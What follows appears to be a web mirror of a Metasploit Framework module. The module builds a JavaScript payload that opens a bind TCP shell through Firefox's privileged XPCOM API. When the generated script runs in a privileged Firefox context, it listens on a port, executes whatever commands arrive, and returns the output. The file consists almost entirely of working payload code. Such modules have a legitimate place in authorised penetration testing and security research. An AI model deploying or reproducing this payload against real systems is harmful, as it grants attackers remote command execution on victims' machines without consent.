CoCalc -- shell_bind

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/firefox/shell_bind_tcp.rb
¹⁹⁵⁹³ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = :dynamic
8

9
  include Msf::Payload::Single
10
  include Msf::Payload::Firefox
11
  include Msf::Sessions::CommandShellOptions
12

13
  def initialize(info = {})
14
    super(
15
      merge_info(
16
        info,
17
        'Name' => 'Command Shell, Bind TCP (via Firefox XPCOM script)',
18
        'Description' => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API},
19
        'Author' => ['joev'],
20
        'License' => BSD_LICENSE,
21
        'Platform' => 'firefox',
22
        'Arch' => ARCH_FIREFOX,
23
        'Handler' => Msf::Handler::BindTcp,
24
        'Session' => Msf::Sessions::CommandShell,
25
        'PayloadType' => 'firefox'
26
      )
27
    )
28
  end
29

30
  #
31
  # Returns the JS string to use for execution
32
  #
33
  def generate(_opts = {})
34
    %|
35
    (function(){
36
      window = this;
37
      Components.utils.import("resource://gre/modules/NetUtil.jsm");
38
      var lport = #{datastore['LPORT']};
39
      var rhost = "#{datastore['RHOST']}";
40
      var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
41
                             .createInstance(Components.interfaces.nsIServerSocket);
42
      serverSocket.init(lport, false, -1);
43

44
      var listener = {
45
        onSocketAccepted: function(serverSocket, clientSocket) {
46
          var outStream = clientSocket.openOutputStream(0, 0, 0);
47
          var inStream = clientSocket.openInputStream(0, 0, 0);
48
          var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
49
                     .createInstance(Components.interfaces.nsIInputStreamPump);
50
          pump.init(inStream, -1, -1, 0, 0, true);
51
          pump.asyncRead(clientListener(outStream), null);
52
        }
53
      };
54

55
      #{read_until_token_source}
56

57
      var clientListener = function(outStream) {
58
        return {
59
          onStartRequest: function(request, context) {},
60
          onStopRequest: function(request, context) {},
61
          onDataAvailable: readUntilToken(function(data) {
62
            runCmd(data, function(err, output) {
63
              if(!err) outStream.write(output, output.length);
64
            });
65
          })
66
        };
67
      };
68

69
      #{run_cmd_source}
70

71
      serverSocket.asyncListen(listener);
72
    })();
73
    |
74
  end
75
end
76

77
Product

Resources

Company
